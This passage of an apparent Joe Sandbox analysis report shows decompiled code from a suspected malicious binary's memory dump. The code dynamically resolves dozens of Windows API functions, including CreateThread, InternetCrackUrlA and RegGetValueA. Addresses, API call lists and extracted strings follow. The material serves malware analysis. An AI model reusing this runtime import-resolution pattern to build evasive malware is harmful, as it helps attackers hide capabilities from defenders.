					 *0x41a874 = GetProcAddress(_t92, _t347);
					_t258 =  *0x41a63c; // 0x628788
					_t348 =  *0x41aaa8; // 0x745c0000
					 *0x41a9ac = GetProcAddress(_t348, _t258);
					_t95 =  *0x41a608; // 0x625430
					_t259 =  *0x41aaa8; // 0x745c0000
					 *0x41a9ec = GetProcAddress(_t259, _t95);
					_t349 =  *0x41a528; // 0x625470
					_t97 =  *0x41aaa8; // 0x745c0000
					 *0x41a9fc = GetProcAddress(_t97, _t349);
					_t260 =  *0x41a3ec; // 0x6286b0
					_t350 =  *0x41aaa8; // 0x745c0000
					 *0x41aa28 = GetProcAddress(_t350, _t260);
					_t100 =  *0x41a648; // 0x627af0
					_t261 =  *0x41aaa8; // 0x745c0000
					 *0x41aaa4 = GetProcAddress(_t261, _t100);
					_t351 =  *0x41a298; // 0x6254d0
					_t102 =  *0x41aaa8; // 0x745c0000
					 *0x41aab4 = GetProcAddress(_t102, _t351);
					_t262 =  *0x41a618; // 0x6254f0
					_t352 =  *0x41aaa8; // 0x745c0000
					 *0x41a878 = GetProcAddress(_t352, _t262);
					_t105 =  *0x41a384; // 0x6287a0
					_t263 =  *0x41aaa8; // 0x745c0000
					 *0x41aac0 = GetProcAddress(_t263, _t105);
					_t353 =  *0x41a4ec; // 0x628818
					_t107 =  *0x41aaa8; // 0x745c0000
					 *0x41aa5c = GetProcAddress(_t107, _t353);
					_t264 =  *0x41a38c; // 0x628848
					_t354 =  *0x41aaa8; // 0x745c0000
					_t17 = GetProcAddress(_t354, _t264);
					 *0x41aa94 = _t17;
				}
				if( *0x41a854 != 0) {
					_t83 =  *0x41a6c8; // 0x628128
					_t254 =  *0x41a854; // 0x73ae0000
					 *0x41a940 = GetProcAddress(_t254, _t83);
					_t344 =  *0x41a53c; // 0x625530
					_t85 =  *0x41a854; // 0x73ae0000
					 *0x41a920 = GetProcAddress(_t85, _t344);
					_t255 =  *0x41a180; // 0x628218
					_t345 =  *0x41a854; // 0x73ae0000
					 *0x41a9c4 = GetProcAddress(_t345, _t255);
					_t88 =  *0x41a724; // 0x625650
					_t256 =  *0x41a854; // 0x73ae0000
					 *0x41a870 = GetProcAddress(_t256, _t88);
					_t346 =  *0x41a1fc; // 0x628200
					_t90 =  *0x41a854; // 0x73ae0000
					 *0x41aa6c = GetProcAddress(_t90, _t346);
					_t257 =  *0x41a854; // 0x73ae0000
					_t17 = GetProcAddress(_t257, "RegGetValueA");
					 *0x41a8f8 = _t17;
				}
				if( *0x41a988 != 0) {
					_t334 =  *0x41a4c4; // 0x6281d0
					_t61 =  *0x41a988; // 0x76990000
					 *0x41a9d0 = GetProcAddress(_t61, _t334);
					_t245 =  *0x41a198; // 0x6281e8
					_t335 =  *0x41a988; // 0x76990000
					 *0x41a960 = GetProcAddress(_t335, _t245);
					_t64 =  *0x41a7a8; // 0x625570
					_t246 =  *0x41a988; // 0x76990000
					 *0x41a948 = GetProcAddress(_t246, _t64);
					_t336 =  *0x41a274; // 0x6255b0
					_t66 =  *0x41a988; // 0x76990000
					 *0x41a8bc = GetProcAddress(_t66, _t336);
					_t247 =  *0x41a624; // 0x628368
					_t337 =  *0x41a988; // 0x76990000
					 *0x41a898 = GetProcAddress(_t337, _t247);
					_t69 =  *0x41a2b8; // 0x627c00
					_t248 =  *0x41a988; // 0x76990000
					 *0x41a880 = GetProcAddress(_t248, _t69);
					_t338 =  *0x41a5f0; // 0x628380
					_t71 =  *0x41a988; // 0x76990000
					 *0x41aa38 = GetProcAddress(_t71, _t338);
					_t249 =  *0x41a19c; // 0x628158
					_t339 =  *0x41a988; // 0x76990000
					 *0x41a93c = GetProcAddress(_t339, _t249);
					_t74 =  *0x41a73c; // 0x628230
					_t250 =  *0x41a988; // 0x76990000
					 *0x41a9f0 = GetProcAddress(_t250, _t74);
					_t340 =  *0x41a254; // 0x628098
					_t76 =  *0x41a988; // 0x76990000
					 *0x41a918 = GetProcAddress(_t76, _t340);
					_t251 =  *0x41a404; // 0x627b60
					_t341 =  *0x41a988; // 0x76990000
					 *0x41a87c = GetProcAddress(_t341, _t251);
					_t79 =  *0x41a17c; // 0x625670
					_t252 =  *0x41a988; // 0x76990000
					 *0x41a9a8 = GetProcAddress(_t252, _t79);
					_t342 =  *0x41a154; // 0x628320
					_t81 =  *0x41a988; // 0x76990000
					 *0x41a8d4 = GetProcAddress(_t81, _t342);
					_t253 =  *0x41a778; // 0x6282c0
					_t343 =  *0x41a988; // 0x76990000
					_t17 = GetProcAddress(_t343, _t253);
					 *0x41a9f8 = _t17;
				}
				if( *0x41aa40 != 0) {
					_t60 =  *0x41a120; // 0x626b70
					_t244 =  *0x41aa40; // 0x6ed70000
					_t17 = GetProcAddress(_t244, _t60); // executed
					 *0x41a864 = _t17;
				}
				if( *0x41a94c != 0) {
					_t333 =  *0x41a3a0; // 0x625770
					_t59 =  *0x41a94c; // 0x76600000
					_t17 = GetProcAddress(_t59, _t333);
					 *0x41aa48 = _t17;
				}
				if( *0x41a934 != 0) {
					_t243 =  *0x41a354; // 0x625790
					_t332 =  *0x41a934; // 0x76ae0000
					_t17 = GetProcAddress(_t332, _t243);
					 *0x41a91c = _t17;
				}
				if( *0x41aa34 != 0) {
					_t50 =  *0x41a108; // 0x627038
					_t239 =  *0x41aa34; // 0x73870000
					 *0x41a95c = GetProcAddress(_t239, _t50);
					_t328 =  *0x41a710; // 0x6253d0
					_t52 =  *0x41aa34; // 0x73870000
					 *0x41aa18 = GetProcAddress(_t52, _t328);
					_t240 =  *0x41a510; // 0x626de0
					_t329 =  *0x41aa34; // 0x73870000
					 *0x41a900 = GetProcAddress(_t329, _t240);
					_t55 =  *0x41a35c; // 0x625690
					_t241 =  *0x41aa34; // 0x73870000
					 *0x41a8e0 = GetProcAddress(_t241, _t55);
					_t330 =  *0x41a524; // 0x6271c8
					_t57 =  *0x41aa34; // 0x73870000
					 *0x41a8c0 = GetProcAddress(_t57, _t330);
					_t242 =  *0x41a0a0; // 0x6280e0
					_t331 =  *0x41aa34; // 0x73870000
					_t17 = GetProcAddress(_t331, _t242);
					 *0x41aa60 = _t17;
				}
				if( *0x41aa80 != 0) {
					_t41 =  *0x41a2fc; // 0x6280f8
					_t235 =  *0x41aa80; // 0x6e670000
					 *0x41a9c8 = GetProcAddress(_t235, _t41);
					_t324 =  *0x41a508; // 0x628278
					_t43 =  *0x41aa80; // 0x6e670000
					 *0x41a924 = GetProcAddress(_t43, _t324);
					_t236 =  *0x41a540; // 0x6253b0
					_t325 =  *0x41aa80; // 0x6e670000
					 *0x41aa30 = GetProcAddress(_t325, _t236);
					_t46 =  *0x41a214; // 0x60a728
					_t237 =  *0x41aa80; // 0x6e670000
					 *0x41a888 = GetProcAddress(_t237, _t46);
					_t326 =  *0x41a794; // 0x628ee0
					_t48 =  *0x41aa80; // 0x6e670000
					 *0x41a99c = GetProcAddress(_t48, _t326);
					_t238 =  *0x41a7d0; // 0x628338
					_t327 =  *0x41aa80; // 0x6e670000
					_t17 = GetProcAddress(_t327, _t238);
					 *0x41aa08 = _t17;
				}
				if( *0x41a968 != 0) {
					_t37 =  *0x41a178; // 0x6280b0
					_t233 =  *0x41a968; // 0x76550000
					 *0x41aa4c = GetProcAddress(_t233, _t37);
					_t322 =  *0x41a69c; // 0x627a80
					_t39 =  *0x41a968; // 0x76550000
					 *0x41a89c = GetProcAddress(_t39, _t322);
					_t234 =  *0x41a0e4; // 0x628188
					_t323 =  *0x41a968; // 0x76550000
					_t17 = GetProcAddress(_t323, _t234);
					 *0x41a90c = _t17;
				}
				if( *0x41aa98 != 0) {
					_t34 =  *0x41a270; // 0x628ec0
					_t232 =  *0x41aa98; // 0x750f0000
					 *0x41aa00 = GetProcAddress(_t232, _t34);
					_t321 =  *0x41a378; // 0x628170
					_t36 =  *0x41aa98; // 0x750f0000
					_t17 = GetProcAddress(_t36, _t321);
					 *0x41aa84 = _t17;
				}
				if( *0x41a938 != 0) {
					_t226 =  *0x41a3cc; // 0x626f70
					_t316 =  *0x41a938; // 0x731a0000
					 *0x41a8dc = GetProcAddress(_t316, _t226);
					_t23 =  *0x41a2a0; // 0x628d80
					_t227 =  *0x41a938; // 0x731a0000
					 *0x41a928 = GetProcAddress(_t227, _t23);
					_t317 =  *0x41a308; // 0x626e30
					_t25 =  *0x41a938; // 0x731a0000
					 *0x41a9e8 = GetProcAddress(_t25, _t317);
					_t228 =  *0x41a150; // 0x628248
					_t318 =  *0x41a938; // 0x731a0000
					 *0x41aa2c = GetProcAddress(_t318, _t228);
					_t28 =  *0x41a4f4; // 0x628290
					_t229 =  *0x41a938; // 0x731a0000
					 *0x41aa0c = GetProcAddress(_t229, _t28);
					_t319 =  *0x41a7c8; // 0x628fa0
					_t30 =  *0x41a938; // 0x731a0000
					 *0x41a9b8 = GetProcAddress(_t30, _t319);
					_t230 =  *0x41a380; // 0x628f00
					_t320 =  *0x41a938; // 0x731a0000
					 *0x41a8f0 = GetProcAddress(_t320, _t230);
					_t33 =  *0x41a7b8; // 0x6282d8
					_t231 =  *0x41a938; // 0x731a0000
					_t17 = GetProcAddress(_t231, _t33);
					 *0x41aa7c = _t17;
				}
				if( *0x41a97c != 0) {
					_t314 =  *0x41a174; // 0x628f20
					_t20 =  *0x41a97c; // 0x76610000
					 *0x41a98c = GetProcAddress(_t20, _t314);
					_t225 =  *0x41a3d8; // 0x628e00
					_t315 =  *0x41a97c; // 0x76610000
					_t17 = GetProcAddress(_t315, _t225);
					 *0x41a884 = _t17;
				}
				if( *0x41aa88 != 0) {
					_t18 =  *0x41a448; // 0x6282f0
					_t224 =  *0x41aa88; // 0x6e730000
					_t19 = GetProcAddress(_t224, _t18);
					 *0x41a990 = _t19;
					return _t19;
				}
				return _t17;
			}

0x0040c4aa
0x0040c4b0
0x0040c4b6
0x0040c4c3
0x0040c4c8
0x0040c4cf
0x0040c4db
0x0040c4e0
0x0040c4e7
0x0040c4f4
0x0040c4f9
0x0040c4ff
0x0040c50c
0x0040c511
0x0040c518
0x0040c524
0x0040c529
0x0040c530
0x0040c53d
0x0040c542
0x0040c548
0x0040c555
0x0040c55a
0x0040c561
0x0040c56d
0x0040c572
0x0040c579
0x0040c586
0x0040c58b
0x0040c591
0x0040c59e
0x0040c5a3
0x0040c5aa
0x0040c5b6
0x0040c5bb
0x0040c5c2
0x0040c5cf
0x0040c5d4
0x0040c5da
0x0040c5e7
0x0040c5ec
0x0040c5f3
0x0040c5ff
0x0040c604
0x0040c60b
0x0040c618
0x0040c61d
0x0040c623
0x0040c630
0x0040c635
0x0040c63c
0x0040c648
0x0040c64d
0x0040c654
0x0040c661
0x0040c666
0x0040c66c
0x0040c679
0x0040c67e
0x0040c685
0x0040c691
0x0040c696
0x0040c69d
0x0040c6aa
0x0040c6af
0x0040c6b5
0x0040c6c2
0x0040c6c7
0x0040c6ce
0x0040c6da
0x0040c6df
0x0040c6e6
0x0040c6f3
0x0040c6f8
0x0040c6fe
0x0040c70b
0x0040c710
0x0040c717
0x0040c723
0x0040c728
0x0040c72f
0x0040c73c
0x0040c741
0x0040c747
0x0040c754
0x0040c759
0x0040c760
0x0040c76c
0x0040c771
0x0040c778
0x0040c785
0x0040c78a
0x0040c790
0x0040c79d
0x0040c7a2
0x0040c7a9
0x0040c7b5
0x0040c7ba
0x0040c7c1
0x0040c7ce
0x0040c7d3
0x0040c7d9
0x0040c7e6
0x0040c7eb
0x0040c7f2
0x0040c7fe
0x0040c803
0x0040c80a
0x0040c817
0x0040c81c
0x0040c822
0x0040c82f
0x0040c834
0x0040c83b
0x0040c847
0x0040c84c
0x0040c853
0x0040c860
0x0040c865
0x0040c86b
0x0040c878
0x0040c87d
0x0040c884
0x0040c890
0x0040c895
0x0040c89c
0x0040c8a9
0x0040c8ae
0x0040c8b4
0x0040c8c1
0x0040c8c6
0x0040c8cd
0x0040c8d9
0x0040c8de
0x0040c8e5
0x0040c8f2
0x0040c8f7
0x0040c8fd
0x0040c90a
0x0040c90f
0x0040c916
0x0040c922
0x0040c927
0x0040c92e
0x0040c93b
0x0040c940
0x0040c946
0x0040c953
0x0040c958
0x0040c95f
0x0040c96b
0x0040c970
0x0040c977
0x0040c984
0x0040c98e
0x0040c99a
0x0040c9a4
0x0040c9b1
0x0040c9bb
0x0040c9c8
0x0040c9d2
0x0040c9de
0x0040c9e8
0x0040c9f5
0x0040c9f5
0x0040c9fa
0x0040ca07
0x0040ca0c
0x0040ca12
0x0040ca18
0x0040ca1d
0x0040ca24
0x0040ca2a
0x0040ca2f
0x0040ca3c
0x0040ca41
0x0040ca47
0x0040ca4d
0x0040ca52
0x0040ca59
0x0040ca5f
0x0040ca64
0x0040ca6b
0x0040ca71
0x0040ca76
0x0040ca7c
0x0040ca82
0x0040ca87
0x0040ca8e
0x0040ca94
0x0040ca99
0x0040caa0
0x0040caa6
0x0040caab
0x0040cab1
0x0040cab7
0x0040cabc
0x0040cac3
0x0040cac9
0x0040cace
0x0040cad5
0x0040cadb
0x0040cae7
0x0040cae9
0x0040caef
0x0040cafc
0x0040cb06
0x0040cb13
0x0040cb1d
0x0040cb23
0x0040cb29
0x0040cb29
0x0040cb35
0x0040cb3b
0x0040cb42
0x0040cb4f
0x0040cb54
0x0040cb5a
0x0040cb67
0x0040cb6c
0x0040cb73
0x0040cb7f
0x0040cb84
0x0040cb8b
0x0040cb98
0x0040cb9d
0x0040cba3
0x0040cbb0
0x0040cbb5
0x0040cbbc
0x0040cbc8
0x0040cbcd
0x0040cbd4
0x0040cbe1
0x0040cbe6
0x0040cbec
0x0040cbf9
0x0040cbfe
0x0040cc05
0x0040cc11
0x0040cc1b
0x0040cc22
0x0040cc28
0x0040cc28
0x0040cc34
0x0040cc3a
0x0040cc41
0x0040cc4d
0x0040cc52
0x0040cc59
0x0040cc66
0x0040cc6b
0x0040cc71
0x0040cc7e
0x0040cc83
0x0040cc8a
0x0040cc96
0x0040cc9b
0x0040cca2
0x0040ccaf
0x0040ccb4
0x0040ccba
0x0040ccc7
0x0040cccc
0x0040ccd3
0x0040ccdf
0x0040cce4
0x0040cceb
0x0040ccf8
0x0040ccfd
0x0040cd03
0x0040cd10
0x0040cd15
0x0040cd1c
0x0040cd28
0x0040cd2d
0x0040cd34
0x0040cd3b
0x0040cd41
0x0040cd41
0x0040cd4d
0x0040cd53
0x0040cd59
0x0040cd66
0x0040cd6b
0x0040cd72
0x0040cd7e
0x0040cd83
0x0040cd8a
0x0040cd97
0x0040cd9c
0x0040cda2
0x0040cdaf
0x0040cdb4
0x0040cdbb
0x0040cdc7
0x0040cdd1
0x0040cdd8
0x0040cdde
0x0040cdde
0x0040cdea
0x0040cdf0
0x0040cdf7
0x0040ce03
0x0040ce08
0x0040ce0f
0x0040ce1c
0x0040ce21
0x0040ce27
0x0040ce34
0x0040ce39
0x0040ce40
0x0040ce4c
0x0040ce51
0x0040ce58
0x0040ce65
0x0040ce6a
0x0040ce70
0x0040ce7d
0x0040ce82
0x0040ce89
0x0040ce95
0x0040ce9a
0x0040cea1
0x0040ceae
0x0040ceb3
0x0040ceb9
0x0040cec6
0x0040cecb
0x0040ced2
0x0040cede
0x0040cee3
0x0040ceea
0x0040cef7
0x0040cefc
0x0040cf02
0x0040cf0f
0x0040cf14
0x0040cf1b
0x0040cf27
0x0040cf2c
0x0040cf33
0x0040cf3a
0x0040cf40
0x0040cf40
0x0040cf4c
0x0040cf4e
0x0040cf54
0x0040cf5b
0x0040cf61
0x0040cf61
0x0040cf6d
0x0040cf6f
0x0040cf76
0x0040cf7c
0x0040cf82
0x0040cf82
0x0040cf8e
0x0040cf90
0x0040cf97
0x0040cf9e
0x0040cfa4
0x0040cfa4
0x0040cfb0
0x0040cfb6
0x0040cfbc
0x0040cfc9
0x0040cfce
0x0040cfd5
0x0040cfe1
0x0040cfe6
0x0040cfed
0x0040cffa
0x0040cfff
0x0040d005
0x0040d012
0x0040d017
0x0040d01e
0x0040d02a
0x0040d02f
0x0040d036
0x0040d03d
0x0040d043
0x0040d043
0x0040d04f
0x0040d055
0x0040d05b
0x0040d068
0x0040d06d
0x0040d074
0x0040d080
0x0040d085
0x0040d08c
0x0040d099
0x0040d09e
0x0040d0a4
0x0040d0b1
0x0040d0b6
0x0040d0bd
0x0040d0c9
0x0040d0ce
0x0040d0d5
0x0040d0dc
0x0040d0e2
0x0040d0e2
0x0040d0ee
0x0040d0f0
0x0040d0f6
0x0040d103
0x0040d108
0x0040d10f
0x0040d11b
0x0040d120
0x0040d127
0x0040d12e
0x0040d134
0x0040d134
0x0040d140
0x0040d142
0x0040d148
0x0040d155
0x0040d15a
0x0040d161
0x0040d167
0x0040d16d
0x0040d16d
0x0040d179
0x0040d17f
0x0040d186
0x0040d193
0x0040d198
0x0040d19e
0x0040d1ab
0x0040d1b0
0x0040d1b7
0x0040d1c3
0x0040d1c8
0x0040d1cf
0x0040d1dc
0x0040d1e1
0x0040d1e7
0x0040d1f4
0x0040d1f9
0x0040d200
0x0040d20c
0x0040d211
0x0040d218
0x0040d225
0x0040d22a
0x0040d230
0x0040d237
0x0040d23d
0x0040d23d
0x0040d249
0x0040d24b
0x0040d252
0x0040d25e
0x0040d263
0x0040d26a
0x0040d271
0x0040d277
0x0040d277
0x0040d283
0x0040d285
0x0040d28b
0x0040d292
0x0040d298
0x00000000
0x0040d298
0x0040d29e

APIs

GetProcAddress.KERNEL32(73B60000,00627FC0), ref: 0040C4BD
GetProcAddress.KERNEL32(73B60000,00627FF0), ref: 0040C4D5
GetProcAddress.KERNEL32(73B60000,00625B50), ref: 0040C4EE
GetProcAddress.KERNEL32(73B60000,00627F30), ref: 0040C506
GetProcAddress.KERNEL32(73B60000,00627DF8), ref: 0040C51E
GetProcAddress.KERNEL32(73B60000,00627E28), ref: 0040C537
GetProcAddress.KERNEL32(73B60000,00627D50), ref: 0040C54F
GetProcAddress.KERNEL32(73B60000,00627D80), ref: 0040C567
GetProcAddress.KERNEL32(73B60000,00627E88), ref: 0040C580
GetProcAddress.KERNEL32(73B60000,00627E58), ref: 0040C598
GetProcAddress.KERNEL32(73B60000,00627E70), ref: 0040C5B0
GetProcAddress.KERNEL32(73B60000,00627EA0), ref: 0040C5C9
GetProcAddress.KERNEL32(73B60000,00627D98), ref: 0040C5E1
GetProcAddress.KERNEL32(73B60000,006259B0), ref: 0040C5F9
GetProcAddress.KERNEL32(73B60000,00627F60), ref: 0040C612
GetProcAddress.KERNEL32(73B60000,00625830), ref: 0040C62A
GetProcAddress.KERNEL32(73B60000,00627218), ref: 0040C642
GetProcAddress.KERNEL32(73B60000,00627DB0), ref: 0040C65B
GetProcAddress.KERNEL32(73B60000,006259D0), ref: 0040C673
GetProcAddress.KERNEL32(73B60000,00627F78), ref: 0040C68B
GetProcAddress.KERNEL32(73B60000,006259F0), ref: 0040C6A4
GetProcAddress.KERNEL32(73B60000,00627CD8), ref: 0040C6BC
GetProcAddress.KERNEL32(73B60000,00627F18), ref: 0040C6D4
GetProcAddress.KERNEL32(73B60000,00627EB8), ref: 0040C6ED
GetProcAddress.KERNEL32(73B60000,00627ED0), ref: 0040C705
GetProcAddress.KERNEL32(73B60000,006256D0), ref: 0040C71D
GetProcAddress.KERNEL32(73B60000,00627C90), ref: 0040C736
GetProcAddress.KERNEL32(73B60000,00627EE8), ref: 0040C74E
GetProcAddress.KERNEL32(73B60000,00627F48), ref: 0040C766
GetProcAddress.KERNEL32(73B60000,006253F0), ref: 0040C77F
GetProcAddress.KERNEL32(73B60000,006286C8), ref: 0040C797
GetProcAddress.KERNEL32(73B60000,006286E0), ref: 0040C7AF
GetProcAddress.KERNEL32(73B60000,006287B8), ref: 0040C7C8
GetProcAddress.KERNEL32(73B60000,00628758), ref: 0040C7E0
GetProcAddress.KERNEL32(73B60000,00628728), ref: 0040C7F8
GetProcAddress.KERNEL32(73B60000,006255D0), ref: 0040C811
GetProcAddress.KERNEL32(73B60000,00625710), ref: 0040C829
GetProcAddress.KERNEL32(73B60000,00628710), ref: 0040C841
GetProcAddress.KERNEL32(73B60000,00628830), ref: 0040C85A
GetProcAddress.KERNEL32(73B60000,00625590), ref: 0040C872
GetProcAddress.KERNEL32(73B60000,00626F48), ref: 0040C88A
GetProcAddress.KERNEL32(73B60000,00628698), ref: 0040C8A3
GetProcAddress.KERNEL32(73B60000,00628740), ref: 0040C8BB
GetProcAddress.KERNEL32(73B60000,006256B0), ref: 0040C8D3
GetProcAddress.KERNEL32(73B60000,00625490), ref: 0040C8EC
GetProcAddress.KERNEL32(73B60000,006254B0), ref: 0040C904
GetProcAddress.KERNEL32(73B60000,006286F8), ref: 0040C91C
GetProcAddress.KERNEL32(73B60000,00625550), ref: 0040C935
GetProcAddress.KERNEL32(73B60000,006287D0), ref: 0040C94D
GetProcAddress.KERNEL32(73B60000,006256F0), ref: 0040C965
GetProcAddress.KERNEL32(73B60000,00625630), ref: 0040C97E
GetProcAddress.KERNEL32(73B60000,CreateThread), ref: 0040C994
GetProcAddress.KERNEL32(73B60000,GetEnvironmentVariableA), ref: 0040C9AB
GetProcAddress.KERNEL32(73B60000,SetEnvironmentVariableA), ref: 0040C9C2
GetProcAddress.KERNEL32(73B60000,lstrcpyA), ref: 0040C9D8
GetProcAddress.KERNEL32(73B60000,lstrcpynA), ref: 0040C9EF
LoadLibraryA.KERNEL32(00628008,?,00406BAD), ref: 0040CA01
LoadLibraryA.KERNELBASE(00628050,?,00406BAD), ref: 0040CA12
LoadLibraryA.KERNELBASE(00627F00,?,00406BAD), ref: 0040CA24
LoadLibraryA.KERNEL32(00627D68,?,00406BAD), ref: 0040CA36
LoadLibraryA.KERNELBASE(00627DE0,?,00406BAD), ref: 0040CA47
LoadLibraryA.KERNELBASE(00627DC8,?,00406BAD), ref: 0040CA59
LoadLibraryA.KERNELBASE(00627E10,?,00406BAD), ref: 0040CA6B
LoadLibraryA.KERNELBASE(00627CF0,?,00406BAD), ref: 0040CA7C
LoadLibraryA.KERNELBASE(00627D08,?,00406BAD), ref: 0040CA8E
LoadLibraryA.KERNELBASE(00627CA8,?,00406BAD), ref: 0040CAA0
LoadLibraryA.KERNELBASE(00627D20,?,00406BAD), ref: 0040CAB1
LoadLibraryA.KERNELBASE(00627CC0,?,00406BAD), ref: 0040CAC3
LoadLibraryA.KERNELBASE(00627D38,?,00406BAD), ref: 0040CAD5
GetProcAddress.KERNEL32(770B0000,00627BF0), ref: 0040CAF6
GetProcAddress.KERNEL32(770B0000,memset), ref: 0040CB0D
GetProcAddress.KERNEL32(770B0000,memcpy), ref: 0040CB23
GetProcAddress.KERNEL32(6F710000,006287E8), ref: 0040CB49
GetProcAddress.KERNEL32(6F710000,00625610), ref: 0040CB61
GetProcAddress.KERNEL32(6F710000,00625510), ref: 0040CB79
GetProcAddress.KERNEL32(6F710000,00625730), ref: 0040CB92
GetProcAddress.KERNEL32(6F710000,00628800), ref: 0040CBAA
GetProcAddress.KERNEL32(6F710000,00625410), ref: 0040CBC2
GetProcAddress.KERNEL32(6F710000,00625450), ref: 0040CBDB
GetProcAddress.KERNEL32(6F710000,006255F0), ref: 0040CBF3
GetProcAddress.KERNEL32(6F710000,00625750), ref: 0040CC0B
GetProcAddress.KERNEL32(6F710000,InternetCrackUrlA), ref: 0040CC22
GetProcAddress.KERNEL32(745C0000,00628770), ref: 0040CC47
GetProcAddress.KERNEL32(745C0000,00628788), ref: 0040CC60
GetProcAddress.KERNEL32(745C0000,00625430), ref: 0040CC78
GetProcAddress.KERNEL32(745C0000,00625470), ref: 0040CC90
GetProcAddress.KERNEL32(745C0000,006286B0), ref: 0040CCA9
GetProcAddress.KERNEL32(745C0000,00627AF0), ref: 0040CCC1
GetProcAddress.KERNEL32(745C0000,006254D0), ref: 0040CCD9
GetProcAddress.KERNEL32(745C0000,006254F0), ref: 0040CCF2
GetProcAddress.KERNEL32(745C0000,006287A0), ref: 0040CD0A
GetProcAddress.KERNEL32(745C0000,00628818), ref: 0040CD22
GetProcAddress.KERNEL32(745C0000,00628848), ref: 0040CD3B
GetProcAddress.KERNEL32(73AE0000,00628128), ref: 0040CD60
GetProcAddress.KERNEL32(73AE0000,00625530), ref: 0040CD78
GetProcAddress.KERNEL32(73AE0000,00628218), ref: 0040CD91
GetProcAddress.KERNEL32(73AE0000,00625650), ref: 0040CDA9
GetProcAddress.KERNEL32(73AE0000,00628200), ref: 0040CDC1
GetProcAddress.KERNEL32(73AE0000,RegGetValueA), ref: 0040CDD8
GetProcAddress.KERNEL32(76990000,006281D0), ref: 0040CDFD
GetProcAddress.KERNEL32(76990000,006281E8), ref: 0040CE16
GetProcAddress.KERNEL32(76990000,00625570), ref: 0040CE2E
GetProcAddress.KERNEL32(76990000,006255B0), ref: 0040CE46
GetProcAddress.KERNEL32(76990000,00628368), ref: 0040CE5F
GetProcAddress.KERNEL32(76990000,00627C00), ref: 0040CE77
GetProcAddress.KERNEL32(76990000,00628380), ref: 0040CE8F
GetProcAddress.KERNEL32(76990000,00628158), ref: 0040CEA8
GetProcAddress.KERNEL32(76990000,00628230), ref: 0040CEC0
GetProcAddress.KERNEL32(76990000,00628098), ref: 0040CED8
GetProcAddress.KERNEL32(76990000,00627B60), ref: 0040CEF1
GetProcAddress.KERNEL32(76990000,00625670), ref: 0040CF09
GetProcAddress.KERNEL32(76990000,00628320), ref: 0040CF21
GetProcAddress.KERNEL32(76990000,006282C0), ref: 0040CF3A
GetProcAddress.KERNELBASE(6ED70000,00626B70), ref: 0040CF5B
GetProcAddress.KERNEL32(76600000,00625770), ref: 0040CF7C
GetProcAddress.KERNEL32(76AE0000,00625790), ref: 0040CF9E
GetProcAddress.KERNEL32(73870000,00627038), ref: 0040CFC3
GetProcAddress.KERNEL32(73870000,006253D0), ref: 0040CFDB
GetProcAddress.KERNEL32(73870000,00626DE0), ref: 0040CFF4
GetProcAddress.KERNEL32(73870000,00625690), ref: 0040D00C
GetProcAddress.KERNEL32(73870000,006271C8), ref: 0040D024
GetProcAddress.KERNEL32(73870000,006280E0), ref: 0040D03D
GetProcAddress.KERNEL32(6E670000,006280F8), ref: 0040D062
GetProcAddress.KERNEL32(6E670000,00628278), ref: 0040D07A
GetProcAddress.KERNEL32(6E670000,006253B0), ref: 0040D093
GetProcAddress.KERNEL32(6E670000,0060A728), ref: 0040D0AB
GetProcAddress.KERNEL32(6E670000,00628EE0), ref: 0040D0C3
GetProcAddress.KERNEL32(6E670000,00628338), ref: 0040D0DC
GetProcAddress.KERNEL32(76550000,006280B0), ref: 0040D0FD
GetProcAddress.KERNEL32(76550000,00627A80), ref: 0040D115
GetProcAddress.KERNEL32(76550000,00628188), ref: 0040D12E
GetProcAddress.KERNEL32(750F0000,00628EC0), ref: 0040D14F
GetProcAddress.KERNEL32(750F0000,00628170), ref: 0040D167
GetProcAddress.KERNEL32(731A0000,00626F70), ref: 0040D18D
GetProcAddress.KERNEL32(731A0000,00628D80), ref: 0040D1A5
GetProcAddress.KERNEL32(731A0000,00626E30), ref: 0040D1BD
GetProcAddress.KERNEL32(731A0000,00628248), ref: 0040D1D6
GetProcAddress.KERNEL32(731A0000,00628290), ref: 0040D1EE
GetProcAddress.KERNEL32(731A0000,00628FA0), ref: 0040D206
GetProcAddress.KERNEL32(731A0000,00628F00), ref: 0040D21F
GetProcAddress.KERNEL32(731A0000,006282D8), ref: 0040D237
GetProcAddress.KERNEL32(76610000,00628F20), ref: 0040D258
GetProcAddress.KERNEL32(76610000,00628E00), ref: 0040D271
GetProcAddress.KERNEL32(6E730000,006282F0), ref: 0040D292

Strings

0Wb, xrefs: 0040CB84
pkb, xrefs: 0040CF4E
PUb, xrefs: 0040C927
`{b, xrefs: 0040CEE3
InternetCrackUrlA, xrefs: 0040CC16
GetEnvironmentVariableA, xrefs: 0040C99F
memset, xrefs: 0040CB01
P}b, xrefs: 0040C542
pVb, xrefs: 0040CEFC
pUb, xrefs: 0040CE21
0Tb, xrefs: 0040CC6B
~b, xrefs: 0040C741
SetEnvironmentVariableA, xrefs: 0040C9B6
0Xb, xrefs: 0040C61D
pTb, xrefs: 0040CC83
h}b, xrefs: 0040CA2F
}b, xrefs: 0040CA41
Hob, xrefs: 0040C87D
0Ub, xrefs: 0040CD6B
pWb, xrefs: 0040CF6F
mb, xrefs: 0040CFE6
8pb, xrefs: 0040CFB6
0nb, xrefs: 0040D1B0
PTb, xrefs: 0040CBCD
lstrcpynA, xrefs: 0040C9E3
memcpy, xrefs: 0040CB18
X~b, xrefs: 0040C58B
pob, xrefs: 0040D17F
}b, xrefs: 0040CAAB
P[b, xrefs: 0040C4E0
0Vb, xrefs: 0040C970
(~b, xrefs: 0040C529
p~b, xrefs: 0040C5A3
PVb, xrefs: 0040CD9C
PWb, xrefs: 0040CBFE
CreateThread, xrefs: 0040C989
RegGetValueA, xrefs: 0040CDCC
8}b, xrefs: 0040CACE
lstrcpyA, xrefs: 0040C9CD

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: }b$(~b$0Tb$0Ub$0Vb$0Wb$0Xb$0nb$8pb$8}b$CreateThread$GetEnvironmentVariableA$Hob$InternetCrackUrlA$PTb$PUb$PVb$PWb$P[b$P}b$RegGetValueA$SetEnvironmentVariableA$X~b$`{b$h}b$lstrcpyA$lstrcpynA$memcpy$memset$pTb$pUb$pVb$pWb$pkb$pob$p~b$mb$}b$~b
API String ID: 2238633743-954445883
Opcode ID: 5c6a11f3020753ac3d423ac2ff1df36a17615fb2ca3194d898380672604674f4
